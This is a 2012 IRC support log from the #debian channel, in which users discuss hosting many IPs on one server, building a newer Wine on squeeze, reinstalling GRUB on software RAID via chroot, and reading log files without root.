21:23 | -!- | Holborn [~holborn@170.Red-88-26-182.staticIP.rima-tde.net] has quit [Quit: Lost terminal] |
21:23 | * | simonlnu points TheLaughingMan to an ip(8) howto |
21:25 | <TheLaughingMan> | Unless every howto I have read was wrong using multiple ips involved virtual interfaces of sorts that where treated like normal interfaces for everything else |
21:27 | -!- | crshd [~crshd@175.141.9.121] has quit [Quit: So long, and thanks for all the fish] |
21:27 | -!- | nhorquender [~nhorquend@190.162.136.120] has quit [Remote host closed the connection] |
21:27 | -!- | crshd [~crshd@175.141.9.121] has joined #debian |
21:27 | -!- | crshd [~crshd@175.141.9.121] has quit [] |
21:33 | <simonlnu> | and? |
21:34 | <nevyn> | every howto you have read is wrong |
21:34 | <nevyn> | well.. old |
21:34 | -!- | crshd [~crshd@175.141.9.121] has joined #debian |
21:38 | -!- | crshd [~crshd@175.141.9.121] has quit [] |
21:38 | -!- | crshd [~crshd@175.141.9.121] has joined #debian |
21:41 | -!- | spitfire [~spitfire@c-5fcae455.025-521-6c6b701.cust.bredbandsbolaget.se] has quit [Quit: Leaving] |
21:41 | -!- | tyranos [~tyranos@port-5121.pppoe.wtnet.de] has joined #debian |
21:41 | -!- | tyranos is now known as honders |
21:42 | -!- | honders [~tyranos@port-5121.pppoe.wtnet.de] has quit [] |
21:43 | <simonlnu> | TheLaughingMan: you just need to do named based virtual hosting in apache, or something similar in other httpds. as for the other daemons, that depends on what they support |
21:44 | <kop> | TheLaughingMan: simonlnu's approach would be the smart way. The dumb way is to use lots of ips and alias the interface or assign mutiple ips and so forth. |
21:48 | -!- | teratoma [~txn@i.dont.get.mad.i.get.stabby.net] has joined #debian |
21:48 | <teratoma> | anyone know how to get dpkg-buildsource to look in a certain directory for a gpg key? |
21:49 | <teratoma> | nevermind, figured it out, you do this: |
21:49 | <teratoma> | export GNUPGHOME=/root/build/gpg-key/ |
21:49 | -!- | amarc [~amar@cm-static-13-180.telekabel.ba] has quit [Ping timeout: 480 seconds] |
21:49 | -!- | xharx__ [~xharx@port-92-205-14-147.dynamic.qsc.de] has joined #debian |
21:50 | <nevyn> | you don't even need multiple ip's for ssl hosting these days. (tho you do if you're using apache in debian) |
21:51 | <philipp> | how do i get wine verson 1.3.12 - 1.3.22 on squeeze? |
21:51 | <simonlnu> | i'm a little old fashioned and still do ssl that way ;p |
21:51 | <simonlnu> | philipp: seriously? tried google? |
21:52 | -!- | abdulkarim [~abdulkari@123.237.73.27] has quit [Ping timeout: 480 seconds] |
21:53 | <philipp> | simonlnu, i asked like 10 times something here... everytime googled before... |
21:53 | <simonlnu> | yeh, right. why don't i believe you? |
21:53 | <philipp> | simonlnu, the problem is the packages have dependencys on each other |
21:53 | <philipp> | simonlnu, thats because ur a jerk |
21:54 | <simonlnu> | oooh. i'm soooo hurt. boohoo. *plonk* |
21:55 | <philipp> | i dont even find a repository for debian squeeze with a propper version |
21:56 | <TheLaughingMan> | I am not using apache or an httpds, doing video game hosting and the only way I know of at the moment is to use multiple ips |
21:57 | -!- | xharx_ [~xharx@port-92-205-28-77.dynamic.qsc.de] has quit [Ping timeout: 480 seconds] |
21:57 | <simonlnu> | TheLaughingMan: due to the daemons involved? |
21:58 | <simonlnu> | because i can see that being a limitation |
21:58 | <ml|> | philipp: 19:07:08 < abrotman> philipp: from reading the instructions on their site, and the apt stuff there, if you need that *specific* version, looks like you'll have to compile it from source |
21:58 | <kop> | TheLaughingMan: Well then "man interfaces". |
22:00 | -!- | mode/#debian [+l 468] by debhelper |
22:01 | -!- | jardiamj [~jardiamj@rdbk.p1-170.molalla.net] has joined #debian |
22:01 | <TheLaughingMan> | I have multiple interfaces setup on my server with multiple IPs, I was just seeing if there was some way to have upwards of 100 domains point to a single server and have it based on domains. Cause getting multiple /25's is annoying |
22:02 | -!- | felix__ [~felix@dslb-094-217-100-195.pools.arcor-ip.net] has joined #debian |
22:03 | -!- | AzaToth [~azatoth@93-232-96-87.cust.blixtvik.se] has quit [Remote host closed the connection] |
22:03 | <abrotman> | ml|: and he probably sitll didn't read it |
22:03 | <philipp> | ml|, ill try that... how do i find what dependencys i need to build that certain version of wine? are that the same for every version? |
22:03 | <simonlnu> | quite. i get asked a bunch of questions if i ask for a /28 ;p |
22:04 | <philipp> | abrotman, sencerely screw you... |
22:04 | -!- | mode/#debian [+o abrotman] by ChanServ |
22:04 | -!- | mode/#debian [+q *!*@chello084113015143.2.12.vie.surfer.at] by abrotman |
22:04 | -!- | mode/#debian [-o abrotman] by abrotman |
22:04 | <abrotman> | philipp: try to be nice to people that are trying to help you. |
22:05 | <kop> | TheLaughingMan: If it's going to be based on domains, your app is going to have to use a protocol that recognizes requests based on domains. So it's all about the software you're running. See rfc768 or rfc793 or, for an example of something higher level that recognises domains rfc2616. |
22:06 | <TheLaughingMan> | Hmm |
22:06 | <ml|> | philipp: don't know; but the wine site should have all that info |
22:06 | <abrotman> | ml|: without compiling it, not much there |
22:06 | <ml|> | oh |
22:07 | <abrotman> | especially if he needs that *exact* version .. which is what i told him like two hours ago |
22:07 | <kop> | TheLaughingMan: The first two rfcs are why you need the app to use something higher level. |
22:07 | <ml|> | yeah |
22:07 | <simonlnu> | feels like 2 days ago... |
22:08 | -!- | felix_ [~felix@dslb-094-218-181-128.pools.arcor-ip.net] has quit [Ping timeout: 480 seconds] |
22:08 | <TheLaughingMan> | Yea, oh well might as well try applying for a /22 then |
22:10 | <kop> | TheLaughingMan: Just put it in China and use IPv6. ;-) |
22:11 | <simonlnu> | heh heh |
22:11 | <TheLaughingMan> | Here is another question then, is there an easy way for me to tell a server you have multiple ips? |
22:11 | -!- | lorth [~lorth@199-63-142-46.pool.kielnet.net] has joined #debian |
22:12 | <teratoma> | how do i sign a deb i made with checkinstall ? |
22:13 | <TheLaughingMan> | Most of what I have seen is editing the interfaces file and adding ups and downs for each IP, but that gets to be tedious when you have a /25 for a single server |
22:13 | -!- | TheCrittaC [~critta@christopher-lemay-4.umeres.maine.edu] has quit [Remote host closed the connection] |
22:14 | -!- | srtu [hypnotoad@zoidb3rg.crabdance.com] has quit [Ping timeout: 480 seconds] |
22:14 | -!- | mode/#debian [+o abrotman] by ChanServ |
22:14 | -!- | mode/#debian [-q *!*@chello084113015143.2.12.vie.surfer.at] by abrotman |
22:14 | <simonlnu> | for loop, use ip(8) |
22:14 | -!- | mode/#debian [-o abrotman] by abrotman |
22:15 | -!- | aranax [~aranax@190.148.48.78] has joined #debian |
22:15 | -!- | kevin8t8_ [~kevin8t8@71-220-200-227.eugn.qwest.net] has quit [Remote host closed the connection] |
22:16 | -!- | kevin8t8 [~kevin8t8@71-220-200-227.eugn.qwest.net] has joined #debian |
22:17 | <TheLaughingMan> | Oh well then, need to go convince our ISP that we really are going to be using a /25 for every server |
22:17 | -!- | gudjon [~quassel@fh152n2-g-kt-d2.ias.bredband.telia.com] has joined #debian |
22:18 | -!- | zyga-xchat [~zyga@169.Red-88-3-45.dynamicIP.rima-tde.net] has quit [Quit: Ex-Chat] |
22:18 | <simonlnu> | TheLaughingMan: bring one iface up, for loop the rest in post-up. for example |
22:18 | <simonlnu> | there's probably better ways to do that ;) |
22:19 | <TheLaughingMan> | for example |
22:19 | -!- | kevin8t8 [~kevin8t8@71-220-200-227.eugn.qwest.net] has quit [Remote host closed the connection] |
22:19 | <simonlnu> | oh sorry, for example, blahblah. i put it backwards. i do that. my other nick is backwards man ;p |
22:20 | <TheLaughingMan> | huh |
22:20 | <bones_was_here> | given that you have 65k ports per ip, you'd have to have a pretty epically powerful server to be running that many games you need 128 ip's per machine lol |
22:21 | <TheLaughingMan> | Well we do have 256GB of RAM, 4 16-Core CPUs >.> |
22:21 | -!- | rsalveti` [~rsalveti@186.214.61.208] has joined #debian |
22:22 | -!- | janos_ [~janos@95.180.50.154] has quit [Quit: Leaving.] |
22:22 | <simonlnu> | yeh really... |
22:22 | <TheLaughingMan> | How many of the cores are real I have no idea, but linux says we have 0-63 CPUs |
22:23 | <bones_was_here> | that's quite beefy, but still not enough to exhaust the ports available on just ONE ip, even assuming each server occupies less than 50MB of RAM |
22:24 | <TheLaughingMan> | Well the thing though is customers want dedicated IPs for 1 game server |
22:25 | <bones_was_here> | if people didn't do this kind of thing, ipv4 would not have run out of space yet |
22:25 | <simonlnu> | people shouldn't *offer* that sort of thing ;). stupid marketroids |
22:25 | <TheLaughingMan> | We offer it if people pay for it |
22:27 | <simonlnu> | i pay 10$/month for a /28. i imagine a /25 is something like 40 or 50? |
22:27 | <bones_was_here> | humans in general are quite stupid; it's both unnecessary and easy to script the bringup of any amount of ip addresses |
22:28 | -!- | rsalveti [~rsalveti@186.214.63.206] has quit [Ping timeout: 480 seconds] |
22:28 | <bones_was_here> | the kind of people who think having a dedicated IP affects the amount of resources their game will get on the host's equipment, are the same ones who throw out their machine and buy a new one when windows breaks or they get a virus |
22:30 | <TheLaughingMan> | a /25 for us is $90 |
22:30 | <TheLaughingMan> | They actually get more expensive the more we want |
22:31 | <TheLaughingMan> | Some people want to type XXX.XXX.XXX.XXX instead of XXX.XXX.XXX.XXX:25687 |
22:31 | <bones_was_here> | a PC is just $500 - $1000, which for most people is trivial, and does not represent the amount of resources they are wasting by throwing away their virused machine |
22:32 | -!- | ODEIONICKGRANDE [~marcio@187.122.244.127] has joined #debian |
22:32 | -!- | lolkenlol [~ken@c-69-138-250-61.hsd1.md.comcast.net] has joined #debian |
22:33 | <TheLaughingMan> | Well we better start working on a IPv8 with 256-bit addresses |
22:33 | <bones_was_here> | it also ignores the millions of poor kids who would very much like to have that computer |
22:33 | <philipp> | can i speak again? |
22:34 | <bones_was_here> | you don't need to ask permission |
22:34 | -!- | ODEIONICKGRANDE is now known as d1ck |
22:34 | <bones_was_here> | this is all offtopic anyway, your question about debian always has priority in #debian |
22:34 | <TheLaughingMan> | or IPv10 with 512-bit addresses |
22:35 | -!- | kristianpaul [~kristianp@cl-498.udi-01.br.sixxs.net] has quit [Quit: leaving] |
22:35 | <philipp> | yes! the newerst version on sourceforge of wine http://sourceforge.net/projects/wine/files/Source/ is 1.1.27 but i need 1.3 or later |
22:36 | <bones_was_here> | philipp: winehq.org is wine's website, so if debian's version is too old, head there |
22:36 | <XeL64> | http://downloads.sourceforge.net/project/wine/Source/wine-1.3.13.tar.bz2 ? |
22:37 | <bones_was_here> | XeL64: that's also quite old |
22:37 | <bones_was_here> | winehq.org has packages for debian, but if they're too old try the ubuntu packages, which usually work on debian |
22:37 | -!- | asr33 [~asr33@64.56.250.251] has quit [Quit: leaving] |
22:37 | <philipp> | bones_was_here, ye i went there and looked for the source code. It liked me to sourceforge and... well... |
22:37 | <XeL64> | maybe playonlinux ? include newest version no ? |
22:37 | <bones_was_here> | philipp: there's a link to the latest wine sourcecode on their front page bro |
22:37 | -!- | kristianpaul [~kristianp@2001:1291:200:1f1::2] has joined #debian |
22:38 | <bones_was_here> | where it says the source is available now |
22:38 | <philipp> | XeL64, i already tried. its forceing a version of wine for that game that does not work |
22:38 | -!- | d1ck [~marcio@187.122.244.127] has quit [Quit: Saindo] |
22:38 | <XeL64> | http://dev.carbon-project.org/debian/wine-unstable/ |
22:39 | <XeL64> | on winhg ;) |
22:39 | <XeL64> | winhq ;) |
22:39 | <XeL64> | winehq lol |
22:39 | <TheLaughingMan> | Yes Windows HQ |
22:40 | <XeL64> | keep windows for commercial games ;) |
22:40 | <XeL64> | http://www.winehq.org/download/debian |
22:41 | <TheLaughingMan> | And for everything commercial I need to run to manage the company stuff :( |
22:41 | <TheLaughingMan> | Why must every develop for windows |
22:41 | <XeL64> | ;) |
22:41 | -!- | Xdept [~Xdept@202.170.168.233] has quit [Quit: This computer has gone to sleep] |
22:41 | <XeL64> | don t know why |
22:41 | -!- | martin_ [~martin@f048003089.adsl.alicedsl.de] has joined #debian |
22:42 | <XeL64> | but best game title (my opinion) are natively (allmost lol) playable on linux ;) |
22:42 | <XeL64> | eve online, minecraft (cheated java ;) ) |
22:42 | <TheLaughingMan> | Atleast it's better then having your company require macs |
22:42 | <TheLaughingMan> | EvE Online no longer supports Linux outright anymore |
22:43 | <XeL64> | i like macs too ;) (not macs too expensive) but os x ;) |
22:43 | <abrotman> | !ot |
22:43 | <dpkg> | #debian is primarily a support channel for Debian users. Please keep the discussions in #debian on-topic and take longer discussions and non-support questions to #debian-offtopic. Imagine the chaos if each of the hundreds of people in the channel felt the need to wander off topic for a few minutes every day. |
22:43 | <philipp> | my bad... makeing progress again |
22:43 | <XeL64> | no more ?? |
22:43 | <TheLaughingMan> | Now lets start talkin politics >:) |
22:43 | <XeL64> | shit |
22:44 | <abrotman> | TheLaughingMan: use #debian-offtopic |
22:44 | <XeL64> | sry too ;) |
22:44 | <TheLaughingMan> | Just a joke on how easy it is to get hundreds of people to wander off topic at the same time for hours |
22:45 | <XeL64> | ;) |
22:45 | <TheLaughingMan> | Imagine that chaos |
22:45 | -!- | andy_ [~andy@c-71-237-73-146.hsd1.co.comcast.net] has joined #debian |
22:45 | <andy_> | #scanning |
22:45 | <XeL64> | ok 2nd time i install debian with softraid ;) i hope grub will install properly |
22:46 | <XeL64> | last time grub install on wrong disk |
22:46 | <XeL64> | not bootable on my bios lol |
22:47 | <TheLaughingMan> | I have actually had some random issues with softraid, where the os would lockup writing to a HDD and would require a reboot |
22:47 | <XeL64> | when i write grub-install /dev/sd? it generate some grub.cfg too ? |
22:48 | <XeL64> | i try fakeraid at start few years ago, then hardraid low cost (under 300$) and no softraid next time i lost data no raid only sync ;) |
22:49 | -!- | gruetzkopf [~martin@f049041101.adsl.alicedsl.de] has quit [Ping timeout: 480 seconds] |
22:49 | -!- | andy_ [~andy@c-71-237-73-146.hsd1.co.comcast.net] has quit [] |
22:52 | -!- | lolkenlol [~ken@c-69-138-250-61.hsd1.md.comcast.net] has left #debian [Leaving] |
22:52 | -!- | indigo [~indigo@d14-69-78-200.try.wideopenwest.com] has quit [Quit: leaving] |
22:52 | -!- | lolkenlol [~ken@c-69-138-250-61.hsd1.md.comcast.net] has joined #debian |
22:52 | -!- | lolkenlol [~ken@c-69-138-250-61.hsd1.md.comcast.net] has left #debian [] |
22:53 | -!- | chitchat [~guest@ppp59-167-188-93.static.internode.on.net] has quit [Ping timeout: 480 seconds] |
22:53 | <XeL64> | did you know what's wrong : localhost wpa_supplicant[2617]: Failed to initiate AP scan. live install squeeze 6.0.3 ..... when i select deb mirror |
22:53 | <XeL64> | network is up |
22:53 | <XeL64> | (on syslog) |
22:54 | <XeL64> | ok ofund ;) |
22:54 | <XeL64> | it s trying to search with wlan0 and not with eht0 |
22:56 | -!- | dvs [~me@cwv.teksavvy.com] has quit [Remote host closed the connection] |
22:59 | -!- | liegruppe [~felix@dslb-088-067-118-163.pools.arcor-ip.net] has joined #debian |
23:00 | -!- | mode/#debian [+l 462] by debhelper |
23:02 | -!- | Brutus [~blank@obelix.mdnx.net] has joined #debian |
23:02 | -!- | lolkenlol [~ken@c-69-138-250-61.hsd1.md.comcast.net] has joined #debian |
23:06 | -!- | felix__ [~felix@dslb-094-217-100-195.pools.arcor-ip.net] has quit [Ping timeout: 480 seconds] |
23:08 | -!- | dtw [dtw@dsl-roibrasgw1-fe84fb00-215.dhcp.inet.fi] has joined #debian |
23:09 | -!- | rufian [~ntrrgc@87.111.216.141] has quit [Quit: Konversation terminated!] |
23:11 | -!- | wangfei [~wangfei@58.34.42.246] has joined #debian |
23:11 | -!- | wangfei [~wangfei@58.34.42.246] has quit [] |
23:13 | -!- | rjsalts [~rjsalts@staff.nm.vic.au.editure.net] has quit [Read error: Operation timed out] |
23:13 | -!- | Q-Master [~qmaster@95-29-18-12.broadband.corbina.ru] has quit [Remote host closed the connection] |
23:14 | <XeL64> | don t know why but dns doesnt works pending my install on live squeeze 6.0.3 |
23:16 | <XeL64> | i got some probs with installing grub on softraid : default is installing on /dev/sda and i want on /dev/sde and /dev/sdf |
23:16 | <XeL64> | when i try i got some error |
23:17 | -!- | prem [~prem@218.248.25.99] has joined #debian |
23:17 | <XeL64> | http://paste.debian.net/155658/ |
23:18 | <XeL64> | i need to mount sde and sdf before ? |
23:19 | <XeL64> | because when i try it s say me is already mount |
23:20 | <XeL64> | http://paste.debian.net/155659/ |
23:20 | <XeL64> | i need some help i think |
23:20 | <kop> | XeL64: It shouldn't matter if it's mounted. It's installing straight onto the drive. (or partition.) |
23:20 | <XeL64> | but got some error |
23:20 | <XeL64> | no matter ? |
23:21 | -!- | aranax [~aranax@190.148.48.78] has quit [Quit: Saliendo] |
23:22 | <XeL64> | ok maybe need to mount /boot no ? |
23:22 | -!- | amoe [~amoe@host-78-147-154-164.as13285.net] has quit [Read error: Connection reset by peer] |
23:22 | <XeL64> | to update grub.cfg |
23:23 | <kop> | XeL64: grub2 is now configured in /etc/default/grub, although I don't really know the details. |
23:24 | <scientes> | XeL64, two ways to update grub |
23:24 | <scientes> | update-grub just does the .cfg |
23:24 | -!- | a16g_ [~anthony@s14.usassh.com] has quit [Ping timeout: 480 seconds] |
23:24 | <scientes> | and install-grub that installs to MBR |
23:24 | <XeL64> | don t work cannot find device |
23:25 | <XeL64> | for twice |
23:25 | <scientes> | ? |
23:25 | <scientes> | your /etc/fstab should be using UUID s |
23:25 | <kop> | XeL64: What are you really trying to do? Installing grub from a live cd seems pointless. You boot off the cd anyway. |
23:25 | <scientes> | kop, thats the best way to fix grub |
23:25 | <XeL64> | i cant mount /dev/sde1 and /dev/sde2 for /boot and / |
23:25 | <kop> | scientes: Better to chroot then. |
23:25 | <scientes> | you use grub-install --root=/fooo /dev/blah |
23:26 | <scientes> | with the switch you don't need chroot |
23:26 | <kop> | scientes: Although to get the mbr in I suppose it's not required. |
23:26 | <XeL64> | mbr is in i think on my 1st grub boot but no choice no config i think ;) |
23:26 | <scientes> | kop, you do have to get boot/grub.cfg in the right place, that is why you use the root switch |
23:27 | <kop> | scientes: Yeah. |
23:27 | <XeL64> | i need to replace /fooo with ? /etc/default/grub ? |
23:27 | <scientes> | man grub-install |
23:27 | <scientes> | it would be /media/something |
23:28 | -!- | amoe [~amoe@host-78-147-154-164.as13285.net] has joined #debian |
23:28 | <kop> | The info pages are really the best when it comes to grub. |
23:28 | <XeL64> | ok |
23:28 | <scientes> | well, the man page in this case descripbes it fine |
23:28 | <scientes> | I abhorr info pages |
23:28 | <kop> | scientes: Yes, and you seem to be more awake and aware than I am, especially when it comes to grub2. |
23:29 | <kop> | scientes: I reserve my abhorration for documentation available only in html. |
23:29 | <XeL64> | for --root=/boot/grub or only /boot ? |
23:29 | <scientes> | some stuff is in /etc/default/grub; other stuff in /etc/grub.d/* |
23:29 | <philipp> | i compiled my wine... how do i install it or whatever i have to do? |
23:29 | <scientes> | and you have to use update-grub to compile that stuff into /boot/grub/grub.cfg |
23:30 | <XeL64> | i ve mount my /md0 which is /boot mirrored on /mnt/ |
23:30 | <scientes> | philipp, generally make install as root, but that doesn't make a dev package which is much nicer to deal with |
23:30 | <scientes> | */dev/.deb |
23:30 | -!- | infinity0 [~infinity0@host-78-145-20-132.as13285.net] has quit [Ping timeout: 480 seconds] |
23:30 | <kop> | philipp: Depends on what you're trying to do. I don't know what wine requires, but some programs you can just plain run by typing the path to the binary. That's those that don't need supporting data files (conf files/etc.) |
23:31 | <scientes> | if it is formatted right philipp you can do dpkg-buildpackage |
23:31 | -!- | oramirez [~oramirez@d24-150-32-216.home.cgocable.net] has quit [Ping timeout: 480 seconds] |
23:32 | <scientes> | but that usually only works on sources from debian, otherwise every package is differn't is it supports .deb/.rpm creation, make sure you have fakeroot installed so you don't have to make packages as root |
23:33 | <scientes> | XeL64, grub-install --boot-directory=/mnt /dev/md0 -- are you sure its md0? i've never seen that type of name |
23:33 | -!- | a16g_ [~anthony@74.117.63.117] has joined #debian |
23:34 | <scientes> | but that will use config files of the liveCD |
23:34 | <scientes> | if you don't want that you have to chroot |
23:35 | <XeL64> | yes i think it s better to chroot |
23:35 | <scientes> | umount /mnt |
23:36 | <scientes> | then mount /dev/rootfs /mnt; mount /dev/bootdir /mnt/boot; mount --bind /dev /mnt/dev; chroot /mnt |
23:36 | <scientes> | then mount proc; mount sys; grub-install /dev/fooo |
23:37 | <XeL64> | rootfs does not exist ;) |
23:37 | <scientes> | WHAAAA? |
23:37 | <scientes> | what the hell are you trying to do? |
23:37 | <XeL64> | this one: mount /dev/rootfs /mnt |
23:38 | <XeL64> | oh lol root fs ;) |
23:38 | <scientes> | you have to change "rootfs" to whatever device your root filesystem is |
23:38 | <scientes> | YEAHHHH |
23:38 | <XeL64> | mistake ;) |
23:38 | <scientes> | .... |
23:38 | <XeL64> | i need tu use my brain sometime... not often ;) |
23:39 | <philipp> | the guy who rote my wiki suggested checkinstall... worked fine just for the record |
23:39 | <scientes> | oh yeah, I forgot about that |
23:39 | -!- | MisterFluffy [~MisterFlu@misterfluffy.dsl.xmission.com] has quit [Quit: KVIrc 4.1.3 Equilibrium http://www.kvirc.net/] |
23:40 | <philipp> | no prob... just tould you so you have the entire experience of supporting |
23:41 | -!- | infinity0 [~infinity0@host-78-145-20-132.as13285.net] has joined #debian |
23:42 | <XeL64> | humm my root fs is used but empty : ls -la nothing... |
23:42 | <XeL64> | i try to mount mirrored volume |
23:42 | <XeL64> | like /dev/md1 |
23:42 | -!- | oramirez [~oramirez@d24-150-32-216.home.cgocable.net] has joined #debian |
23:42 | <XeL64> | i got it few sec agao |
23:43 | <philipp> | scientes, what i mean is u can give better advice if you get feetback what worked and what did not |
23:44 | <scientes> | philipp, I should have mentioned it, it is the easist and best thing to do when there isn't a .deb creation possibility |
23:44 | <scientes> | ..from upstream |
23:44 | <XeL64> | ok i try to mount when i m in dir no working i think or need to go out and in again |
23:44 | <XeL64> | it s working now |
23:44 | <scientes> | XeL64, fdisk -l |
23:45 | <scientes> | make sure you bind mount /dev like i show above, and get proc mounted---grub needs them to install |
23:45 | <scientes> | i don't think grub needs /sys |
23:45 | <XeL64> | http://paste.debian.net/155665/ |
23:46 | <XeL64> | doesn't contain a valid partition table : don t care ?? |
23:46 | <scientes> | what does uname -r; uname -m print out BTW? |
23:46 | <scientes> | cause i've never seen md devices |
23:47 | -!- | oramirez [~oramirez@d24-150-32-216.home.cgocable.net] has quit [] |
23:47 | <XeL64> | uname -r : 2.6.32-5-amd64 |
23:47 | <XeL64> | uname -m x86_64 |
23:47 | <scientes> | ok, squeeze, no need for -m |
23:47 | -!- | zykotic10 [~ZykoticK9@66.11.174.71] has joined #debian |
23:48 | -!- | zykotic10 [~ZykoticK9@66.11.174.71] has quit [] |
23:48 | <scientes> | it says no valid parition table cause they are all raw partitions without a table |
23:48 | <scientes> | AFACT |
23:49 | -!- | microbe [~microbe@d51A43B47.access.telenet.be] has joined #debian |
23:49 | <XeL64> | i'm chrooted and i see all files |
23:49 | <scientes> | well, try grub-install /dev/whateverdevice you boot off of in BIOS |
23:49 | <scientes> | use blkid and fdisk -l to tell which one you want |
23:50 | <XeL64> | physical or raid device ? |
23:50 | <scientes> | are you using fakeraid? |
23:50 | <microbe> | Hi there =) I would like to know, how can i acces log files, witout the need to be root ? |
23:50 | <XeL64> | nop soft only |
23:50 | <XeL64> | microbe : chown or chmod on log ? |
23:51 | <scientes> | microbe, tail -f /var/log/foofile; and if its not permissioned you need to change the permissions, AND the default permissions in the program making the log file, such as syslog |
23:51 | <microbe> | Ok thanks, i'll check that :D |
23:51 | <XeL64> | it seems to work with few errors |
23:52 | <scientes> | microbe, http://wiki.debian.org/Permissions |
23:52 | <scientes> | XeL64, thats install, test if your boot works |
23:52 | -!- | dtw [dtw@dsl-roibrasgw1-fe84fb00-215.dhcp.inet.fi] has quit [Quit: ERC Version 5.3 (IRC client for Emacs)] |
23:52 | <XeL64> | http://paste.debian.net/155666/ |
23:52 | <XeL64> | i got same errors past and boot but stuck in grub prompt |
23:52 | <scientes> | and note that fakeraid is strongly recommended against |
23:53 | <scientes> | yeah its screwed up |
23:53 | <scientes> | if you need hd5 it wont work |
23:53 | <microbe> | Is this correct if i change te owner's group of log/ ? |
23:53 | <microbe> | i will not encounter errors ? |
23:53 | <scientes> | microbe, likely |
23:54 | <XeL64> | (hd5,msdos1,msdos1) ? |
23:54 | <scientes> | you could do chmod -R o+r /var/log |
23:54 | -!- | Dark_Knight [~Dark_Knig@85.136.173.2.dyn.user.ono.com] has joined #debian |
23:54 | -!- | Dark_Knight [~Dark_Knig@85.136.173.2.dyn.user.ono.com] has quit [] |
23:54 | <scientes> | but then new log files would still be created with the same permissions they are being created with now microbe |
23:55 | <scientes> | also, by default all users can run dmesg and see kernel errors as they happen, AFAIK |
23:55 | <microbe> | i see ... i need to change something in syslog.conf ? |
23:55 | <scientes> | I havn't done it, but there will be a default permissions setting somewhere, possibly there |
23:56 | <microbe> | :) |
--- | Log | closed Thu Feb 09 00:00:07 2012 |